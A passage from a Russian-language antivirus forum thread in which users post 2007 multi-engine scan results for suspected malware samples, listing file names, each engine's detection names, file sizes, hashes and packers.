Authentium	4.93.8	2007.09.11	-
Avast	4.7.1043.0	2007.09.10	-
AVG	7.5.0.485	2007.09.10	-
*BitDefender	7.2	2007.09.11	Trojan.PWS.LDPinch.TAW*
CAT-QuickHeal	9.00	2007.09.10	-
ClamAV	0.91.2	2007.09.11	-
*DrWeb	4.33	2007.09.10	Trojan.Packed.166*
eSafe	7.0.15.0	2007.09.04	-
eTrust-Vet	31.1.5124	2007.09.10	-
Ewido	4.0	2007.09.10	-
FileAdvisor	1	2007.09.11	-
*Fortinet	3.11.0.0	2007.09.11	Basine.C*
F-Prot	4.3.2.48	2007.09.11	-
*F-Secure	6.70.13030.0	2007.09.11	Packed.Win32.PolyCrypt.c
Ikarus	T3.1.1.12	2007.09.11	Packed.Win32.PolyCrypt.c
Kaspersky	4.0.2.24	2007.09.11	Packed.Win32.PolyCrypt.c*
McAfee	5116	2007.09.10	-
*Microsoft	1.2803	2007.09.11	TrojanDownloader:Win32/Small.CBA*
NOD32v2	2520	2007.09.11	-
Norman	5.80.02	2007.09.10	-
Panda	9.0.0.4	2007.09.11	-
Prevx1	V2	2007.09.11	-
*Rising	19.40.10.00	2007.09.11	Packer.RyCrypt
Sophos	4.21.0	2007.09.11	Mal/Basine-C
Sunbelt	2.2.907.0	2007.09.11	Trojan-PWS.LDPinch.TAW
Symantec	10	2007.09.11	Infostealer*
TheHacker	6.1.10.183	2007.09.10	-
VBA32	3.12.2.4	2007.09.09	-
VirusBuster	4.3.26:9	2007.09.10	-
*Webwasher-Gateway	6.0.1	2007.09.10	Trojan.Crypt.XPACK.Gen*
Дополнительная информация
File size: 91983 bytes
MD5: 406bb99c9af1a2158803a42ae91362d6
SHA1: e119252d2ef300034e2746fe2f482583bfb65376
packers: RCrypt

*Добавлено через 20 минут*

Файл C2.tmp получен 2007.09.11 09:15:32 (CET)
Текущий статус:    закончено 
Результат: 7/32 (21.88%) 
Антивирус	Версия	Обновление	Результат
*AhnLab-V3	2007.9.11.1	2007.09.11	Win-Trojan/Agent.22048.B*
AntiVir	7.6.0.5	2007.09.10	-
Authentium	4.93.8	2007.09.11	-
Avast	4.7.1043.02007.09.10	-
AVG	7.5.0.485	2007.09.10	-
BitDefender	7.2	2007.09.11	-
*CAT-QuickHeal	9.00	2007.09.10	Backdoor.Shell.d*
ClamAV	0.91.2	2007.09.11	-
DrWeb	4.33	2007.09.10	-
*eSafe	7.0.15.0	2007.09.04	suspicious Trojan/Worm*
eTrust-Vet	31.1.5124	2007.09.10	-
Ewido	4.0	2007.09.10	-
FileAdvisor	1	2007.09.11	-
Fortinet	3.11.0.0	2007.09.11	-
F-Prot	4.3.2.48	2007.09.11	-
F-Secure	6.70.13030.0	2007.09.11	-
Ikarus	T3.1.1.12	2007.09.11	-
Kaspersky	4.0.2.24	2007.09.11	-
McAfee	5116	2007.09.10	-
Microsoft	1.2803	2007.09.11	-
NOD32v2	2520	2007.09.11	-
Norman	5.80.02	2007.09.10	-
*Panda	9.0.0.4	2007.09.11	Suspicious file
Prevx1	V2	2007.09.11	Heuristic: Suspicious Self Modifying File
Rising	19.40.10.00	2007.09.11	Trojan.DL.Win32.Agent.ycp*
Sophos	4.21.0	2007.09.11	-
Sunbelt	2.2.907.0	2007.09.11	-
Symantec	10	2007.09.11	-
TheHacker	6.1.10.183	2007.09.10	-
VBA32	3.12.2.4	2007.09.09	-
VirusBuster	4.3.26:9	2007.09.10	-
*Webwasher-Gateway	6.0.1	2007.09.10	Win32.Malware.gen (suspicious)*
Дополнительная информация
File size: 22048 bytes
MD5: 546996f51122f44df0984e5a847b0f43
SHA1: 702a273bf24e2f28df0552e15eefc8793047608b
packers: BINARYRES
Prevx info: http://fileinfo.prevx.com/fileinfo.a...F5DA00EF69860B

----------


## drongo

t=12341


```
Файл protect.sys получен 2007.09.11 11:15:51 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.11.1	2007.09.11	-
AntiVir	7.6.0.5	2007.09.11	TR/Agent.NWI.1
Authentium	4.93.8	2007.09.11	-
Avast	4.7.1043.0	2007.09.10	-
AVG	7.5.0.485	2007.09.10	PSW.Agent.NWI
BitDefender	7.2	2007.09.11	-
CAT-QuickHeal	9.00	2007.09.10	-
ClamAV	0.91.2	2007.09.11	Trojan.Agent-7550
DrWeb	4.33	2007.09.10	Trojan.NtRootKit.361
eSafe	7.0.15.0	2007.09.04	-
eTrust-Vet	31.1.5124	2007.09.10	-
Ewido	4.0	2007.09.10	-
FileAdvisor	1	2007.09.11	-
Fortinet	3.11.0.0	2007.09.11	-
F-Prot	4.3.2.48	2007.09.11	-
F-Secure	6.70.13030.0	2007.09.11	-
Ikarus	T3.1.1.12	2007.09.11	-
Kaspersky	4.0.2.24	2007.09.11	-
McAfee	5116	2007.09.10	-
Microsoft	1.2803	2007.09.11	-
NOD32v2	2520	2007.09.11	Win32/SpamTool.Agent.NAJ
Norman	5.80.02	2007.09.10	-
Panda	9.0.0.4	2007.09.11	Rootkit/Agent.GJE
Prevx1	V2	2007.09.11	-
Rising	19.40.12.00	2007.09.11	-
Sophos	4.21.0	2007.09.11	-
Sunbelt	2.2.907.0	2007.09.11	SpamTool.Win32.Agent.n
Symantec	10	2007.09.11	-
TheHacker	6.1.10.184	2007.09.11	-
VBA32	3.12.2.4	2007.09.09	-
VirusBuster	4.3.26:9	2007.09.10	-
Webwasher-Gateway	6.0.1	2007.09.10	-
Дополнительная информация
File size: 18944 bytes
MD5: 13a366eef1bf920ffcf754716fda7ade
SHA1: a614eae1da5ee91f034958e23ebd8410ae981115
```

----------


## XL

Мал золотник, да удал!




> AhnLab-V3	2007.9.11.1	2007.09.11	-
> *AntiVir	7.6.0.5	2007.09.10	TR/Delphi.Downloader.Gen
> Authentium	4.93.8	2007.09.11	Possibly a new variant of W32/Threat-SysVenFak-based!Maximus
> Avast	4.7.1043.0	2007.09.10	Win32:Goldun-KG
> AVG	7.5.0.485	2007.09.10	PSW.Delf.AIR
> BitDefender	7.2	2007.09.11	Trojan.Agent.Delf.DD*
> CAT-QuickHeal	9.00	2007.09.10	-
> ClamAV	0.91.2	2007.09.11	-
> DrWeb	4.33	2007.09.10	-
> ...


Дополнительная информация
File size: 25600 bytes

----------


## ISO

Файл bpkun.exe получен 2007.09.12 16:28:35 (CET)
Текущий статус:    закончено 
Результат: 15/32 (46.88%) 
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.11.1	2007.09.12	-
*AntiVir	7.6.0.5	2007.09.12	TR/Keylog.40960.D*
Authentium	4.93.8	2007.09.12	-
Avast	4.7.1043.0	2007.09.11	-
AVG	7.5.0.485	2007.09.12	-
*BitDefender	7.2	2007.09.12	Generic.Perfloger.EC7DD4E0*
CAT-QuickHeal	9.00	2007.09.12	-
*ClamAV	0.91.2	2007.09.12	Trojan.PerfectKeylogger.153.Gen
DrWeb	4.33	2007.09.12	Trojan.Peflog.158
eSafe	7.0.15.0	2007.09.12	Spyware.Gen*
eTrust-Vet	31.1.5128	2007.09.12	-
Ewido	4.0	2007.09.12	-
*FileAdvisor	1	2007.09.12	High threat detected
Fortinet	3.11.0.0	2007.09.12	Keylog/Perfect*
F-Prot	4.3.2.48	2007.09.12	-
F-Secure	6.70.13030.0	2007.09.12	-
*Ikarus	T3.1.1.12	2007.09.12	Generic.Perfloger*
Kaspersky	4.0.2.24	2007.09.12	-
*McAfee	5117	2007.09.11	potentially unwanted program Keylog-Perfect*
Microsoft	1.2803	2007.09.12	-
NOD32v2	2524	2007.09.12	-
Norman	5.80.02	2007.09.12	-
*Panda	9.0.0.4	2007.09.12	Suspicious file
Prevx1	V2	2007.09.12	Heuristic: Suspicious Hijacker*
Rising	19.40.22.00	2007.09.12	-
Sophos	4.21.0	2007.09.12	-
*Sunbelt	2.2.907.0	2007.09.12	Perfect Keylogger
Symantec	10	2007.09.12	Spyware.Perfect*
TheHacker	6.1.10.184	2007.09.11	-
*VBA32	3.12.2.4	2007.09.12	Trojan.Peflog.158*
VirusBuster	4.3.26:9	2007.09.12	-
*Webwasher-Gateway	6.0.1	2007.09.12	Trojan.Keylog.40960.D*
Дополнительная информация
File size: 40960 bytes
MD5: ea1f8d8e45cf7630f7c00a4a26aaf54d
SHA1: 20418f04fcf2422f5e2d3019b3e1347c0a74e980
Bit9 info: http://fileadvisor.bit9.com/services...c00a4a26aaf54d
Prevx info: http://fileinfo.prevx.com/fileinfo.a...CF790070B7D8C8

----------


## drongo

*T=12413*



```
Файл SysCVMS.exe получен 2007.09.13 10:13:58 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.13.0	2007.09.12	-
AntiVir	7.6.0.10	2007.09.13	TR/Crypt.ULPM.Gen
Authentium	4.93.8	2007.09.12	-
Avast	4.7.1043.0	2007.09.12	-
AVG	7.5.0.485	2007.09.12	Win32/PolyCrypt
BitDefender	7.2	2007.09.13	-
CAT-QuickHeal	9.00	2007.09.12	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.13	-
DrWeb	4.33	2007.09.12	Trojan.Packed.166
eSafe	7.0.15.0	2007.09.12	suspicious Trojan/Worm
eTrust-Vet	31.1.5130	2007.09.13	-
Ewido	4.0	2007.09.12	-
FileAdvisor	1	2007.09.13	-
Fortinet	3.11.0.0	2007.09.13	-
F-Prot	4.3.2.48	2007.09.12	-
F-Secure	6.70.13030.0	2007.09.13	-
Ikarus	T3.1.1.12	2007.09.13	-
Kaspersky	4.0.2.24	2007.09.13	-
McAfee	5118	2007.09.12	-
Microsoft	1.2803	2007.09.13	TrojanDownloader:Win32/Small.CBA
NOD32v2	2527	2007.09.13	-
Norman	5.80.02	2007.09.12	-
Panda	9.0.0.4	2007.09.13	-
Prevx1	V2	2007.09.13	-
Rising	19.40.31.00	2007.09.13	Packer.RyCrypt
Sophos	4.21.0	2007.09.13	Mal/EncPk-AW
Sunbelt	2.2.907.0	2007.09.13	Trojan-Downloader.Win32.Small.CBA
Symantec	10	2007.09.13	-
TheHacker	6.1.10.186	2007.09.13	-
VBA32	3.12.2.4	2007.09.12	-
VirusBuster	4.3.26:9	2007.09.12	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.09.13	Trojan.Crypt.ULPM.Gen
Дополнительная информация
File size: 38860 bytes
MD5: 7e786a8a2b04c4b6829efe2f6d5dc2a4
SHA1: 85b7411e8c7b1c9c17baab7997c56b00fb64b47e
```

----------


## mayas

новое ? или хорошо забытое старое  :Wink: 





> File crack.exe received on 09.13.2007 16:51:16 (CET)
> Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
> Result: 13/32 (40.63%)
> 
> 
> Antivirus 	Version 	Last Update 	Result
> AhnLab-V3	2007.9.13.0	2007.09.12	-
> AntiVir	7.6.0.10	2007.09.13	_HEUR/Crypted_
> Authentium	4.93.8	2007.09.12	*Possibly a new variant of W32/new-malware!Maximus*
> ...


*Добавлено через 2 часа 30 минут*

File beegen.exe received on 09.13.2007 19:26:42 (CET)


Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.9.13.0	2007.09.12	-
AntiVir	7.6.0.10	2007.09.13	*HEUR/Crypted*
Authentium	4.93.8	2007.09.12	-
Avast	4.7.1043.0	2007.09.13	-
AVG	7.5.0.485	2007.09.13	-
BitDefender	7.2	2007.09.13	-
CAT-QuickHeal	9.00	2007.09.13	-
ClamAV	0.91.2	2007.09.13	-
DrWeb	4.33	2007.09.13	*Trojan.PWS.LDPinch.2253*
eSafe	7.0.15.0	2007.09.13	_suspicious Trojan/Worm_
eTrust-Vet	31.1.5134	2007.09.13	-
Ewido	4.0	2007.09.13	-
FileAdvisor	1	2007.09.13	-
Fortinet	3.11.0.0	2007.09.13	-
F-Prot	4.3.2.48	2007.09.13	-
F-Secure	6.70.13030.0	2007.09.13	*Trojan-PSW.Win32.PdPinch.gen*
Ikarus	T3.1.1.12	2007.09.13	-
Kaspersky	4.0.2.24	2007.09.13	*Trojan-PSW.Win32.PdPinch.gen*
McAfee	5119	2007.09.13	-
Microsoft	1.2803	2007.09.13	-
NOD32v2	2528	2007.09.13	*a variant of Win32/PSW.LdPinch.RG*
Norman	5.80.02	2007.09.13	-
Panda	9.0.0.4	2007.09.13	*Trj/Ldpinch.WE*
Prevx1	V2	2007.09.13	*Heuristic: Suspicious File With Anti-Debug Technology*
Rising	19.40.32.00	2007.09.13	-
Sophos	4.21.0	2007.09.13	_Mal/Basine-C_
Sunbelt	2.2.907.0	2007.09.13	_VIPRE.Suspicious_
Symantec	10	2007.09.13	-
TheHacker	6.1.10.186	2007.09.13	*Trojan/PSW.PdPinch.gen*
VBA32	3.12.2.4	2007.09.13	*MalwareScope.Trojan-PSW.Pinch.1*
VirusBuster	4.3.26:9	2007.09.13	-
Webwasher-Gateway	6.0.1	2007.09.13	_Heuristic.Crypted_
Additional information
File size: 22016 bytes
MD5: 2d4ec44cf38fae09eb24b8cbaef894da
SHA1: 30c556ed0ea99f5147e9e396fd495176a2263a57
packers: TELOCK, ASPACK
packers: TeLock, Aspack
Prevx info: http://fileinfo.prevx.com/fileinfo.a...5FDC00135AF228
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## mayas

File WebMoney_Generator_7.6.exe received on 09.14.2007 10:07:44 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 2/32 (6.25%)


Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.9.14.0	2007.09.14	-
AntiVir	7.6.0.10	2007.09.14	-
Authentium	4.93.8	2007.09.14	-
Avast	4.7.1043.0	2007.09.13	-
AVG	7.5.0.485	2007.09.14	-
BitDefender	7.2	2007.09.14	-
CAT-QuickHeal	9.00	2007.09.13	-
ClamAV	0.91.2	2007.09.14	-
DrWeb	4.33	2007.09.14	-
eSafe	7.0.15.0	2007.09.13	-
eTrust-Vet	31.1.5135	2007.09.14	-
Ewido	4.0	2007.09.13	-
FileAdvisor	1	2007.09.14	-
Fortinet	3.11.0.0	2007.09.14	-
F-Prot	4.3.2.48	2007.09.13	-
F-Secure	6.70.13030.0	2007.09.14	*Trojan-Spy.Win32.Webmoner.cj*
Ikarus	T3.1.1.12	2007.09.14	-
Kaspersky	4.0.2.24	2007.09.14	*Trojan-Spy.Win32.Webmoner.cj*
McAfee	5119	2007.09.13	-
Microsoft	1.2803	2007.09.14	-
NOD32v2	2529	2007.09.13	-
Norman	5.80.02	2007.09.13	-
Panda	9.0.0.4	2007.09.13	-
Prevx1	V2	2007.09.14	-
Rising	19.40.41.00	2007.09.14	-
Sophos	4.21.0	2007.09.14	-
Sunbelt	2.2.907.0	2007.09.13	-
Symantec	10	2007.09.14	-
TheHacker	6.2.5.059	2007.09.14	-
VBA32	3.12.2.4	2007.09.13	-
VirusBuster	4.3.26:9	2007.09.13	-
Webwasher-Gateway	6.0.1	2007.09.14	-
Additional information
File size: 147456 bytes
MD5: 41d642db131764807743f380311d3c0a
SHA1: ebb3721a0ad75213c4edef298e005dc312de0680

----------


## V_Bond

http://virusinfo.info/showthread.php?t=12298 srosa.sys

AhnLab-V3	2007.9.14.0	2007.09.14	-
*AntiVir	7.6.0.10	2007.09.14	Worm/Bagle.ZJJ*
Authentium	4.93.8	2007.09.14	-
*Avast	4.7.1043.0	2007.09.14	Win32:Beagle-WF*
*AVG	7.5.0.485	2007.09.14	Obfustat.NPV*
*BitDefender	7.2	2007.09.14	Win32.Worm.Bagle.ZJJ*
CAT-QuickHeal	9.00	2007.09.14	-
ClamAV	0.91.2	2007.09.14	-
*DrWeb	4.33	2007.09.14	Win32.HLLM.Beagle*
eSafe	7.0.15.0	2007.09.13	-
eTrust-Vet	31.1.5136	2007.09.14	-
Ewido	4.0	2007.09.14	-
FileAdvisor	1	2007.09.14	-
Fortinet	3.11.0.0	2007.09.14	-
F-Prot	4.3.2.48	2007.09.13	-
F-Secure	6.70.13030.0	2007.09.14	-
*Ikarus	T3.1.1.12	2007.09.14	Email-Worm.Win32.Bagle.ik*
Kaspersky	4.0.2.24	2007.09.14	-
McAfee	5120	2007.09.14	-
Microsoft	1.2803	2007.09.14	-
*NOD32v2	2530	2007.09.14	Win32/Bagle.JQ*
Norman	5.80.02	2007.09.14	-
Panda	9.0.0.4	2007.09.14	-
*Prevx1	V2	2007.09.14	Heuristic: Suspicious File With Anti-Security* Technology
Rising	19.40.42.00	2007.09.14	-
Sophos	4.21.0	2007.09.14	-
*Sunbelt	2.2.907.0	2007.09.13	VIPRE.Suspicious*
Symantec	10	2007.09.14	-
TheHacker	6.2.5.060	2007.09.14	-
*VBA32	3.12.2.4	2007.09.14	Worm.Win32.Bagle.JQ*
VirusBuster	4.3.26:9	2007.09.14	-
*Webwasher-Gateway	6.0.1	2007.09.14	Worm.Bagle.ZJJ*
Дополнительная информация
File size: 110706 bytes
MD5: 51a9675a4300224fc23778df31f63066
SHA1: 61ade0c7f185efb24fcd73467746955c7a1910ab

----------


## Синауридзе Александр

Файл 35c041.dll получен 2007.09.15 04:46:30 (CET)

AhnLab-V3 2007.9.14.0 2007.09.14 - 
*AntiVir 7.6.0.10 2007.09.14 HEUR/Malware* 
*Authentium 4.93.8 2007.09.15 W32/Downldr2.AHGD* 
Avast 4.7.1043.0 2007.09.14 - 
AVG 7.5.0.485 2007.09.14 - 
BitDefender 7.2 2007.09.15 - 
CAT-QuickHeal 9.00 2007.09.14 - 
ClamAV 0.91.2 2007.09.14 - 
*DrWeb 4.33 2007.09.14 DLOADER.Trojan* 
eSafe 7.0.15.0 2007.09.13 - 
eTrust-Vet 31.1.5136 2007.09.14 - 
Ewido 4.0 2007.09.14 - 
FileAdvisor 1 2007.09.15 - 
Fortinet 3.11.0.0 2007.09.14 - 
*F-Prot 4.3.2.48 2007.09.15 W32/Downldr2.AHGD* 
F-Secure 6.70.13030.0 2007.09.15 - 
Ikarus T3.1.1.12 2007.09.15 - 
Kaspersky 4.0.2.24 2007.09.15 - 
McAfee 5120 2007.09.14 - 
Microsoft 1.2803 2007.09.15 - 
NOD32v2 2531 2007.09.15 - 
Norman 5.80.02 2007.09.14 - 
Panda 9.0.0.4 2007.09.14 - 
Prevx1 V2 2007.09.15 - 
Rising 19.40.50.00 2007.09.15 - 
Sophos 4.21.0 2007.09.15 - 
Sunbelt 2.2.907.0 2007.09.15 - 
Symantec 10 2007.09.15 - 
TheHacker 6.2.5.060 2007.09.14 - 
VBA32 3.12.2.4 2007.09.14 - 
VirusBuster 4.3.26:9 2007.09.14 - 
*Webwasher-Gateway 6.0.1 2007.09.14 Heuristic.Malware* 

Дополнительная информация 
File size: 28672 bytes 
MD5: 7cd6b32f5676bfa2818276ab66699769 
SHA1: 3e6985f7d963922eba94944643c5fbf9ef5e52f5

----------


## drongo

```
 Файл jkkjk.dll получен 2007.09.17 16:21:27 (CET)

	
Антивирус 	Версия 	Обновление 	Результат
AhnLab-V3	2007.9.14.0	2007.09.14	-
AntiVir	7.6.0.10	2007.09.17	-
Authentium	4.93.8	2007.09.16	-
Avast	4.7.1043.0	2007.09.16	-
AVG	7.5.0.485	2007.09.16	Lop.DO
BitDefender	7.2	2007.09.17	DeepScan:Generic.Virtumonde.1.6AC0853B
CAT-QuickHeal	9.00	2007.09.17	-
ClamAV	0.91.2	2007.09.17	-
DrWeb	4.33	2007.09.17	-
eSafe	7.0.15.0	2007.09.17	Suspicious Trojan/Worm
eTrust-Vet	31.1.5141	2007.09.17	Win32/Vundo!generic
Ewido	4.0	2007.09.17	-
FileAdvisor	1	2007.09.17	-
Fortinet	3.11.0.0	2007.09.17	-
F-Prot	4.3.2.48	2007.09.16	-
F-Secure	6.70.13030.0	2007.09.17	W32/Vundo.dam
Ikarus	T3.1.1.12	2007.09.17	Generic.Virtumonde.1
Kaspersky	4.0.2.24	2007.09.17	-
McAfee	5120	2007.09.14	-
Microsoft	1.2803	2007.09.17	-
NOD32v2	2534	2007.09.17	-
Norman	5.80.02	2007.09.17	W32/Vundo.dam
Panda	9.0.0.4	2007.09.17	Suspicious file
Prevx1	V2	2007.09.17	Heuristic: Suspicious Self Modifying EXE
Rising	19.41.02.00	2007.09.17	-
Sophos	4.21.0	2007.09.17	Virtumundo
Sunbelt	2.2.907.0	2007.09.15	VIPRE.Suspicious
Symantec	10	2007.09.17	-
TheHacker	6.2.5.061	2007.09.17	-
VBA32	3.12.2.4	2007.09.17	-
VirusBuster	4.3.26:9	2007.09.17	Adware.Vundo.P.Gen
Webwasher-Gateway	6.0.1	2007.09.17	Virus.Win32.FileInfector.gen (suspicious)
Дополнительная информация
File size: 244832 bytes
MD5: 38a47c4538e143a09770b3a63205b1c8
SHA1: 1992381a620028d43c3f2eaea6ff7447bb92bd6e
packers: PecBundle, PECompact
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=8ADD549360B20789BCA1030E35F006001839AE35
Sunbelt info: VIPRE.Suspicious is a generic dete
```

----------


## PavelA

http://virusinfo.info/showthread.php?t=12548




> Файл avz00001.dta (ntoskrnl.exe) получен 2007.09.19 18:41:17 (CET)Антивирус Версия Обновление Результат 
> AhnLab-V3 2007.9.19.0 2007.09.19 - 
> AntiVir 7.6.0.15 2007.09.19 - 
> Authentium 4.93.8 2007.09.19 - 
> Avast 4.7.1043.0 2007.09.18 - 
> AVG 7.5.0.485 2007.09.18 - 
> BitDefender 7.2 2007.09.19 - 
> CAT-QuickHeal 9.00 2007.09.19 - 
> ClamAV 0.91.2 2007.09.19 - 
> ...

----------


## yu_mor

Файл syshkwh.exe получен 2007.09.21 15:32:15 (CET)
AhnLab-V3 2007.9.21.0 2007.09.20 - 
AntiVir 7.6.0.15 2007.09.21 - 
*Authentium 4.93.8 2007.09.21 W32/Bancos.ALHR 
Avast 4.7.1043.0 2007.09.20 Win32:Bancos-AOX* 
AVG 7.5.0.485 2007.09.20 - 
BitDefender 7.2 2007.09.21 - 
CAT-QuickHeal 9.00 2007.09.20 - 
*ClamAV 0.91.2 2007.09.21 Trojan.Gpcode 
DrWeb 4.33 2007.09.21 Trojan.Proxy.2024 
eSafe 7.0.15.0 2007.09.19 Suspicious Trojan/Worm* 
eTrust-Vet 31.2.5153 2007.09.21 - 
Ewido 4.0 2007.09.20 - 
FileAdvisor 1 2007.09.21 - 
Fortinet 3.11.0.0 2007.09.21 - 
*F-Prot 4.3.2.48 2007.09.21 W32/Trojan.BQCZ* 
F-Secure 6.70.13030.0 2007.09.21 - 
Ikarus T3.1.1.12 2007.09.21 - 
Kaspersky 4.0.2.24 2007.09.21 - 
McAfee 5124 2007.09.20 - 
Microsoft 1.2803 2007.09.21 - 
NOD32v2 2543 2007.09.21 - 
Norman 5.80.02 2007.09.21 - 
*Panda 9.0.0.4 2007.09.21 Trj/Bancos.RD* 
Prevx1 V2 2007.09.21 - 
Rising 19.41.42.00 2007.09.21 - 
Sophos 4.21.0 2007.09.21 - 
Sunbelt 2.2.907.0 2007.09.20 - 
*Symantec 10 2007.09.21 Infostealer.Notos!gen* 
TheHacker 6.2.5.064 2007.09.21 - 
VBA32 3.12.2.4 2007.09.20 - 
VirusBuster 4.3.26:9 2007.09.20 - 
*Webwasher-Gateway 6.0.1 2007.09.21 Win32.Malware.dam (suspicious)* 
Дополнительная информация 
File size: 40960 bytes 
MD5: acb12a0ad9d9cf124ad337ead64dbca0 
SHA1: b19526a9308b93bad4f1c1502890e6ff31ec5493 


Файл sysoaoe.exe получен 2007.09.21 15:39:15 (CET)
AhnLab-V3 2007.9.21.0 2007.09.20 - 
*AntiVir 7.6.0.15 2007.09.21 TR/Crypt.XPACK.Gen* 
Authentium 4.93.8 2007.09.21 - 
Avast 4.7.1043.0 2007.09.20 - 
AVG 7.5.0.485 2007.09.20 - 
*BitDefender 7.2 2007.09.21 Trojan.AVKiller.AS* 
CAT-QuickHeal 9.00 2007.09.20 - 
*ClamAV 0.91.2 2007.09.21 Trojan.Agent-7828 
DrWeb 4.33 2007.09.21 Trojan.MulDrop.8347 
eSafe 7.0.15.0 2007.09.19 Suspicious Trojan/Worm* 
eTrust-Vet 31.2.5153 2007.09.21 - 
Ewido 4.0 2007.09.20 - 
FileAdvisor 1 2007.09.21 - 
Fortinet 3.11.0.0 2007.09.21 - 
F-Prot 4.3.2.48 2007.09.21 - 
*F-Secure 6.70.13030.0 2007.09.21 Backdoor.Win32.Kbot.b* 
Ikarus T3.1.1.12 2007.09.21 - 
*Kaspersky 4.0.2.24 2007.09.21 Backdoor.Win32.Kbot.b* 
McAfee 5124 2007.09.20 - 
Microsoft 1.2803 2007.09.21 - 
NOD32v2 2543 2007.09.21 - 
Norman 5.80.02 2007.09.21 - 
_Panda 9.0.0.4 2007.09.21 Suspicious file_ 
Prevx1 V2 2007.09.21 - 
Rising 19.41.42.00 2007.09.21 - 
Sophos 4.21.0 2007.09.21 - 
Sunbelt 2.2.907.0 2007.09.20 - 
Symantec 10 2007.09.21 - 
TheHacker 6.2.5.064 2007.09.21 - 
VBA32 3.12.2.4 2007.09.20 - 
VirusBuster 4.3.26:9 2007.09.20 - 
*Webwasher-Gateway 6.0.1 2007.09.21 Trojan.Crypt.XPACK.Gen* 
Дополнительная информация 
File size: 11869 bytes 
MD5: 4935f52060d93b2958021b058c576d98 
SHA1: 2cec2bf1bc42a02918e640a2e7728310483463af

----------


## Kuzz

Файл moonlander.exe получен 2007.09.22 09:55:12 (CET)
 Текущий статус:     закончено   

Результат: 5/32 (15.63%)

Форматированные Форматированные 
Печать результатов Печать результатов 
Запрос ответа на e-mailАнтивирус
Версия
Обновление
Результат
AhnLab-V3  2007.9.22.0  2007.09.21  -
  AntiVir  7.6.0.15  2007.09.21  -
  Authentium  4.93.8  2007.09.21  -
  Avast  4.7.1043.0  2007.09.22  -
  AVG  7.5.0.485  2007.09.21  -
  BitDefender  7.2  2007.09.22  -
  CAT-QuickHeal  9.00  2007.09.21  -
  ClamAV  0.91.2  2007.09.21  -
*  DrWeb  4.33  2007.09.22  Trojan.PWS.LDPinch.1903*
  eSafe  7.0.15.0  2007.09.19  -
  eTrust-Vet  31.2.5154  2007.09.21  -
  Ewido  4.0  2007.09.20  -
  FileAdvisor  1  2007.09.22  -
  Fortinet  3.11.0.0  2007.09.22  -
  F-Prot  4.3.2.48  2007.09.21  -
  F-Secure  6.70.13030.0  2007.09.21  -
*  Ikarus  T3.1.1.12  2007.09.22  Trojan-PWS.LDPinch.1903*
  Kaspersky  4.0.2.24  2007.09.22  -
  McAfee  5125  2007.09.21  -
  Microsoft  1.2803  2007.09.22  -
  NOD32v2  2544  2007.09.21  -
  Norman  5.80.02  2007.09.21  -
*  Panda  9.0.0.4  2007.09.22  Suspicious file*
  Prevx1  V2  2007.09.22  -
*  Rising  19.41.51.00  2007.09.22  Dropper.Win32.Agent.bgn*
  Sophos  4.21.0  2007.09.22  -
  Sunbelt  2.2.907.0  2007.09.22  -
  Symantec  10  2007.09.22  -
  TheHacker  6.2.5.066  2007.09.22  -
*  VBA32  3.12.2.4  2007.09.22  Trojan.PWS.LDPinch.1903*
  VirusBuster  4.3.26:9  2007.09.21  -
  Webwasher-Gateway  6.0.1  2007.09.21  -
  Дополнительная информация
File size: 166355 bytes
  MD5: 72591eee1003e63dbc5dc09faafb6ea7
  SHA1: b636546066bf609267f31212746492ef45a9f8b8

----------


## Winsent

Файл ses.exe получен 2007.09.23 13:44:04 (CET)


Антивирус	Версия	Обновление	Результат

AhnLab-V3	2007.9.22.0	2007.09.21	-
*AntiVir	7.6.0.15	2007.09.21	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.09.23	-
Avast	4.7.1043.0	2007.09.22	-
AVG	7.5.0.485	2007.09.22	-
*BitDefender	7.2	2007.09.23	Trojan.AVKiller.AS
CAT-QuickHeal	9.00	2007.09.21	(Suspicious) - DNAScan*
ClamAV	0.91.2	2007.09.23	-
*DrWeb	4.33	2007.09.23	Trojan.MulDrop.8347
eSafe	7.0.15.0	2007.09.19	Suspicious Trojan/Worm*
eTrust-Vet	31.2.5154	2007.09.21	-
Ewido	4.0	2007.09.20	-
FileAdvisor	1	2007.09.23	-
Fortinet	3.11.0.0	2007.09.23	-
F-Prot	4.3.2.48	2007.09.23	-
F-Secure	6.70.13030.0	2007.09.21	-
Ikarus	T3.1.1.12	2007.09.23	-
Kaspersky	4.0.2.24	2007.09.23	-
McAfee	5125	2007.09.21	-
Microsoft	1.2803	2007.09.23	-
NOD32v2	2545	2007.09.23	-
Norman	5.80.02	2007.09.21	-
*Panda	9.0.0.4	2007.09.23	Suspicious file*
Prevx1	V2	2007.09.23	-
Rising	19.41.62.00	2007.09.23	-
Sophos	4.21.0	2007.09.23	-
Sunbelt	2.2.907.0	2007.09.22	-
Symantec	10	2007.09.23	-
TheHacker	6.2.5.066	2007.09.22	-
VBA32	3.12.2.4	2007.09.23	-
VirusBuster	4.3.26:9	2007.09.22	-
*Webwasher-Gateway	6.0.1	2007.09.21	Trojan.Crypt.XPACK.Gen*

Дополнительная информация
File size: 36973 bytes
MD5: e48255ab09d9d93858f986f510b8749f
SHA1: 6d641317ab25891b005e899856662adbc73664cd

*Добавлено через 4 часа 2 минуты*

Файл bac.exe получен 2007.09.23 17:35:21 (CET)
Текущий статус:   закончено 
Результат: 8/32 (25%) 


Антивирус	Версия	Обновление	Результат

AhnLab-V3	2007.9.22.0	2007.09.21	-
*AntiVir	7.6.0.15	2007.09.21	DR/Delphi.Gen*
Authentium	4.93.8	2007.09.23	-
*Avast	4.7.1043.0	2007.09.22	Win32dPinch-AQU*
AVG	7.5.0.485	2007.09.23	-
BitDefender	7.2	2007.09.23	-
CAT-QuickHeal	9.00	2007.09.21	-
ClamAV	0.91.2	2007.09.23	-
*DrWeb	4.33	2007.09.23	Trojan.MulDrop.8524
